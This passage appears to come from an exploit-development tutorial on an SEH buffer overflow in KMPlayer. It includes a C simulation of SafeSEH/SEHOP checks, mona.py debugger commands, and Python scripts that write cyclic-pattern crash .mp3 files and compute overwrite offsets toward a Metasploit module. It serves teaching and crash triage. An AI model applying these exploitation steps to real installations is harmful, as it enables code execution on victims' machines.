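/* SEHOP: walk the chain from `start` through simulated stack memory `mem` (n records,
 * the first at STACK_BASE) and require it to end at the final handler. A record whose
 * Next pointer was overwritten with garbage points nowhere useful and fails the walk. */
int sehop_chain_valid(const seh_record_t *mem, size_t n, uint32_t start) {
    uint32_t addr = start;
    for (size_t hops = 0; hops <= n; hops++) {
        if (addr == CHAIN_END || addr < STACK_BASE) return 0;
        uint32_t off = addr - STACK_BASE;
        if (off % sizeof(seh_record_t) != 0 || off / sizeof(seh_record_t) >= n) return 0;
        const seh_record_t *r = &mem[off / sizeof(seh_record_t)];
        if (r->next == CHAIN_END) return r->handler == FINAL_HANDLER_ADDR;
        addr = r->next;
    }
    return 0;                                     /* cycle: never reached the end */
}

/* Full scenario on a fresh frame: a valid two-record chain, then a copy of `len` 'A'
 * bytes. Reports the handler now in the record and whether each check still passes. */
size_t run_scenario(size_t len, uint32_t *handler, int *safeseh_ok, int *sehop_ok) {
    char input[sizeof(frame_t)];
    memset(input, 'A', sizeof(input));            /* constructed input: all 0x41 */
    seh_record_t mem[2];                          /* mem[0] = frame record, mem[1] = final */
    frame_t f = { "", { (uint32_t)(STACK_BASE + sizeof(seh_record_t)), GOOD_HANDLER_ADDR } };
    mem[1].next = CHAIN_END;
    mem[1].handler = FINAL_HANDLER_ADDR;

    size_t spilled = unsafe_copy(&f, input, len);
    mem[0] = f.seh;                               /* what the dispatcher now sees at STACK_BASE */
    *handler = f.seh.handler;
    *safeseh_ok = safeseh_allows(f.seh.handler);
    *sehop_ok = sehop_chain_valid(mem, 2, STACK_BASE);
    return spilled;
}

/* Single-value wrappers around the scenario. */
uint32_t handler_after(size_t len) { uint32_t h; int s, o; run_scenario(len, &h, &s, &o); return h; }
int safeseh_after(size_t len)      { uint32_t h; int s, o; run_scenario(len, &h, &s, &o); return s; }
int sehop_after(size_t len)        { uint32_t h; int s, o; run_scenario(len, &h, &s, &o); return o; }

int main(void) {
    size_t lens[] = { 8, 16, 20, 24 };
    for (size_t i = 0; i < 4; i++)
        printf("%2zu bytes: handler=%08X  SafeSEH=%s  SEHOP=%s\n", lens[i],
               (unsigned)handler_after(lens[i]),
               safeseh_after(lens[i]) ? "allow" : "block",
               sehop_after(lens[i]) ? "pass" : "fail");
    return 0;
}
```

A 20-byte copy is the instructive middle case: only the Next pointer is clobbered, so SafeSEH still accepts the untouched handler while SEHOP rejects the broken chain.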
<br />
<div class="MsoListParagraph" style="margin-left: .25in; text-indent: -.25in;"><b>2. Fun with !mona</b></div><div class="MsoNormal"><br />
</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;">Now that we have identified the SEH overflow, let’s use mona.py to craft an exploit for it.</div><div class="MsoNormal" style="text-align: justify;"><br />
</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;">Start KMPlayer and attach Immunity Debugger to the process (File &gt; Attach). The debugger pauses the target on attach; use that pause to run the mona.py PyCommands below. Their output appears in the Log window (Alt+L).</div><div class="MsoNormal" style="text-align: justify;"><br />
</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;">Set the working folder with <span style="background: #BFBFBF; font-family: 'Courier New'; font-size: 8.0pt;">!mona config -set workingfolder C:\logs\%p</span> and verify it with <span style="background: #BFBFBF; font-family: 'Courier New'; font-size: 8.0pt;">!mona config -get workingfolder</span>. Use a plain ASCII hyphen in front of <span style="font-family: 'Courier New'; font-size: 8.0pt;">set</span> and <span style="font-family: 'Courier New'; font-size: 8.0pt;">get</span> (a dash pasted from a word processor is not recognised); <span style="font-family: 'Courier New'; font-size: 8.0pt;">%p</span> is a placeholder that mona expands to the name of the debugged process.</div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-YrfpeLGe87M/TgwlBaTpcKI/AAAAAAAAAVs/h93XfC0DG5c/s1600/mona-workinfolder.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://1.bp.blogspot.com/-YrfpeLGe87M/TgwlBaTpcKI/AAAAAAAAAVs/h93XfC0DG5c/s400/mona-workinfolder.JPG" width="400" /></a></div> <br />
<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">From now on every file a !mona command writes (for example the pattern.txt produced in the next step) lands in that directory, with %p replaced by the process name.</div><div class="MsoNormal"><br />
</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;">Next, generate a 5000-byte cyclic pattern and use it in place of the 5000 "A"s in the crashing .mp3 file. The pattern is built so that no four-byte window repeats, so whatever value ends up in EIP, in the SEH record (nSEH and the handler pointer) or in any other register can be mapped back to a single offset in the input. That offset is what the rest of the exploit is built around.</div><div class="MsoNormal" style="text-align: justify;"><br />
</div><span style="font-family: 'Calibri','sans-serif'; font-size: 11.0pt;">Run </span><span style="background: #BFBFBF; font-family: 'Courier New'; font-size: 8.0pt;">!mona pc 5000</span><span style="font-family: 'Calibri','sans-serif'; font-size: 11.0pt;"> in Immunity Debugger.</span><br />
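To show what <code>!mona pc</code> and its counterpart <code>!mona po</code> actually do, here is an added example that is not code from this post and not mona.py's own implementation. It reproduces the standard Metasploit/mona pattern scheme (triplets of upper-case letter, lower-case letter, digit: Aa0Aa1Aa2...), so an offset computed here matches what <code>!mona po</code> reports for the same pattern. The <code>write_crash_file</code> helper assumes the earlier crash file was simply 5000 "A"s saved with an .mp3 extension, which the post does not spell out; the sample dword values are constructed for illustration.

```python
"""Cyclic pattern generation and offset lookup, as !mona pc / !mona po do.

Added example for this post: not the article's code and not mona.py's own
implementation. Same Upper/lower/digit triplet scheme as Metasploit and
mona, so offsets agree with !mona po for the same pattern.
"""
import string
import struct
from typing import Optional, Union

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
# 26 * 26 * 10 triplets of 3 bytes; beyond this the pattern would start repeating
MAX_UNIQUE_LEN = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280


def cyclic_pattern(length: int) -> bytes:
    """Return the first `length` bytes of the Aa0Aa1...Zz9 pattern.

    No four-byte window repeats inside the first MAX_UNIQUE_LEN bytes, so a
    dword copied out of EIP, nSEH or the SEH handler pointer identifies
    exactly one offset in the input.
    """
    if not 0 < length <= MAX_UNIQUE_LEN:
        raise ValueError("length must be 1..%d" % MAX_UNIQUE_LEN)
    triplets = (u + l + d for u in UPPER for l in LOWER for d in DIGITS)
    return "".join(triplets).encode("ascii")[:length]


def _needle(value: Union[int, str, bytes]) -> bytes:
    """Turn a register/SEH value into the 4 bytes as they sit in memory.

    The debugger shows a dword such as 41306141 as a big-endian number, but
    x86 stores it little-endian, so int and hex-string inputs are reversed;
    raw bytes are taken as already being in memory order.
    """
    if isinstance(value, bool):
        raise TypeError("bool is not a register value")
    if isinstance(value, int):
        return struct.pack("<I", value & 0xFFFFFFFF)
    if isinstance(value, str):
        raw = bytes.fromhex(value.lower().replace("0x", "").zfill(8))
        return raw[::-1]
    if isinstance(value, (bytes, bytearray)) and len(value) == 4:
        return bytes(value)
    raise TypeError("value must be an int, an 8-digit hex string or 4 raw bytes")


def pattern_offset(value: Union[int, str, bytes],
                   length: int = MAX_UNIQUE_LEN) -> Optional[int]:
    """Offset of `value` inside the cyclic pattern, or None if it is absent.

    Mirrors !mona po: the memory-order bytes are searched first; if that
    fails the reversed bytes are tried, which catches a value copied from a
    hex dump instead of from the register pane.
    """
    pattern = cyclic_pattern(length)
    needle = _needle(value)
    for candidate in (needle, needle[::-1]):
        idx = pattern.find(candidate)
        if idx != -1:
            return idx
    return None


def write_crash_file(path: str, length: int = 5000) -> int:
    """Write the pattern as the crash file and return the byte count.

    Assumption (not stated in the post): the original crash file was nothing
    more than 5000 "A"s saved with an .mp3 extension, so the pattern simply
    replaces that body.
    """
    data = cyclic_pattern(length)
    with open(path, "wb") as f:
        f.write(data)
    return len(data)


if __name__ == "__main__":
    print(write_crash_file("crash.mp3"), "bytes written")
    # constructed value: the dword an overwrite at offset 9 ("Aa3A") would show
    print(pattern_offset(0x41336141))
```

Open the resulting file in KMPlayer under the debugger; the values that land in nSEH and the SEH handler are then fed to <code>pattern_offset</code> (or <code>!mona po</code>) to obtain the exact offsets for the next step.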
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-vU9JHKTq3BM/Tgwk_4GE_6I/AAAAAAAAAVg/KPg-cAZouH4/s1600/mona-pattern.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://1.bp.blogspot.com/-vU9JHKTq3BM/Tgwk_4GE_6I/AAAAAAAAAVg/KPg-cAZouH4/s400/mona-pattern.JPG" width="400" /></a></div><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--> <br />
<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">This will create a file named “pattern.txt”.</div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-dWbtJC4CT7c/TgwlAlzDOOI/AAAAAAAAAVk/BYUNynYBPDw/s1600/mona-pattern-file.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="http://1.bp.blogspot.com/-dWbtJC4CT7c/TgwlAlzDOOI/AAAAAAAAAVk/BYUNynYBPDw/s400/mona-pattern-file.JPG" width="400" /></a></div><!--[if gte mso 10]> <style>
</style> <![endif]--><div class="MsoNormal" style="text-align: justify; text-indent: 0in;">Copy the pattern, replace the junk content with it and regenerate the mp3 file.</div>
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-_jf7mrJdfyw/Tgwk-fP4OuI/AAAAAAAAAVU/eMIOJDxzvLw/s1600/crash-file-wth-pattern.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="255" src="http://2.bp.blogspot.com/-_jf7mrJdfyw/Tgwk-fP4OuI/AAAAAAAAAVU/eMIOJDxzvLw/s400/crash-file-wth-pattern.JPG" width="400" /></a></div>
<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">Now run KMPlayer from Immunity Debugger, as it is still ‘paused’, and open the newly created mp3 file in KMPlayer.</div>
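<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">The pattern step above, as an added worked example that is neither the page's own code nor mona's: it builds the same Metasploit-style cyclic pattern that pattern.txt holds, prepends a constructed file prefix (the 10-byte ID3v2 header below is an assumption; the page's own mp3 generator is not shown here), and, once the debugger reports the crash registers, maps each register value back to its offset in the pattern. That offset is the triage result a defender wants in the bug report: it states exactly how many bytes of untrusted input the parser copies before it overwrites saved control data, and it is the number a fix is later verified against.</div>

```python
"""Cyclic-pattern crash triage, in the style of mona's pattern_create /
pattern_offset. Added example: not the page's code and not mona's."""
import string
import struct

# Constructed prefix: a 10-byte ID3v2.3 header with a zero tag size, so the
# file is recognised as mp3. Assumption: the real mp3 generator used on the
# page is not shown here; swap in its own header bytes if they differ.
ID3_HEADER = b"ID3\x03\x00\x00\x00\x00\x00\x00"

# 26 upper x 26 lower x 10 digit triads; after this length the pattern repeats.
MAX_UNIQUE = 26 * 26 * 10 * 3  # 20280 bytes


def pattern_create(length):
    """Return the Metasploit-style pattern Aa0Aa1Aa2...Ab0...Ba0... of `length` bytes.

    Every 3-byte triad is unique within the first MAX_UNIQUE bytes, so any
    4-byte window taken from the pattern identifies exactly one offset.
    """
    if length > MAX_UNIQUE:
        raise ValueError("pattern longer than %d bytes is no longer unique" % MAX_UNIQUE)
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern, value):
    """Map a 32-bit register value (as read from the debugger) to its offset
    inside `pattern`, or None when the value did not come from the pattern.

    x86 is little-endian, so the dword shown in EIP is the 4 pattern bytes
    reversed; packing with "<I" reverses them back before searching.
    The result is relative to the pattern; add len(prefix) for the file offset.
    """
    needle = struct.pack("<I", value & 0xFFFFFFFF)
    idx = pattern.find(needle)
    return idx if idx >= 0 else None


def build_crash_file(prefix, length):
    """Prefix + pattern: the 'regenerated' file from the page's step."""
    return prefix + pattern_create(length)


def triage(pattern, registers):
    """Map every crash-time register that holds pattern bytes to its offset.

    `registers` is a dict like {"EIP": 0x41306141, "ESP": 0x0012ff70};
    registers whose value is not found in the pattern are left out, which
    tells you they were not taken straight from the file.
    """
    found = {}
    for name, value in registers.items():
        offset = pattern_offset(pattern, value)
        if offset is not None:
            found[name] = offset
    return found


if __name__ == "__main__":
    size = 5000  # constructed: same order of magnitude as the junk-filled body
    data = build_crash_file(ID3_HEADER, size)
    with open("crash-pattern.mp3", "wb") as fh:  # constructed file name
        fh.write(data)
    # Constructed register dump standing in for what the debugger shows.
    dump = {"EIP": 0x68423368, "ESP": 0x0012FF70}
    print(triage(pattern_create(size), dump))  # -> {'EIP': 1000}
```

<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">Run it as a script to write crash-pattern.mp3, then feed the register values the debugger shows at the crash to triage(). The triads are unique only over the first 20280 bytes, so a longer pattern, or a value that is not found at all, means the register was not filled directly from the file and the crash needs a different explanation before anything is written up.</div>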
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-ETgAoQ8W5R0/Tgwk_Cc7A3I/AAAAAAAAAVY/1YECMwB1aF0/s1600/crash-wth-pattern.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="http://1.bp.blogspot.com/-ETgAoQ8W5R0/Tgwk_Cc7A3I/AAAAAAAAAVY/1YECMwB1aF0/s400/crash-wth-pattern.JPG" width="400" /></a></div><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true" DefSemiHidden="true" DefQFormat="false" DefPriority="99" LatentStyleCount="267"> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: EN-US; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;">The KMPlayer is crashed as expected. Now run </span><span style="background: #BFBFBF; font-family: "Courier New"; font-size: 8.0pt; mso-ansi-language: EN-US; mso-bidi-language: EN-US; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-shading-themecolor: background1; mso-shading-themeshade: 191;">!mona suggest</span><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: EN-US; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"> command. </span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-nzhKiOI-kA4/TgwlBM8F1nI/AAAAAAAAAVo/vRYObRJNFMs/s1600/mona-suggest.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="http://2.bp.blogspot.com/-nzhKiOI-kA4/TgwlBM8F1nI/AAAAAAAAAVo/vRYObRJNFMs/s400/mona-suggest.JPG" width="400" /></a></div><br />
<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">This command analyzes the cyclic pattern to calculate the offsets at which the various registers and the SEH record are overwritten, and generates the payload layout to include in a Metasploit module. It writes all of these details to a file named ‘exploit.rb’.</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;"><br />
</div><span style="font-family: Calibri, sans-serif; font-size: 11.0pt;">Mona has produced exploit payload layouts for both the direct RET overwrite and the SEH overwrite. Now let’s craft a Metasploit module that targets the SEH overwrite.</span><br />
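<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">What <span style="font-family: Courier New;">!mona suggest</span> computes from the crash, shown as an added Python example that is not mona’s or Metasploit’s code: it rebuilds the Metasploit-style cyclic pattern and maps register and SEH values from a constructed (not a real KMPlayer) crash state back to their offsets in the sent buffer, also handling reversed byte order and values the pattern never reached.</div>

```python
"""Cyclic-pattern offset lookup: an added example of what `!mona suggest` derives
from a crash. Constructed for this post; not mona's or Metasploit's own code.
Uses the same 'Aa0Aa1Aa2...' alphabet as Metasploit's pattern_create/pattern_offset."""
import string
from itertools import product
from typing import Optional

PERIOD = 26 * 26 * 10 * 3  # 20280 bytes before the pattern would repeat


def pattern_create(length: int) -> bytes:
    """Return the first `length` bytes of the cyclic pattern Aa0Aa1Aa2...Ab0Ab1..."""
    if length > PERIOD:
        raise ValueError("length exceeds one pattern period (%d bytes)" % PERIOD)
    out = bytearray()
    # digits vary fastest, then lowercase, then uppercase: Aa0 Aa1 ... Aa9 Ab0 ...
    for a, b, c in product(string.ascii_uppercase, string.ascii_lowercase, string.digits):
        out += (a + b + c).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def _as_bytes(value, width: int = 4) -> bytes:
    """Normalise a crash value: an int read from a register or SEH record is
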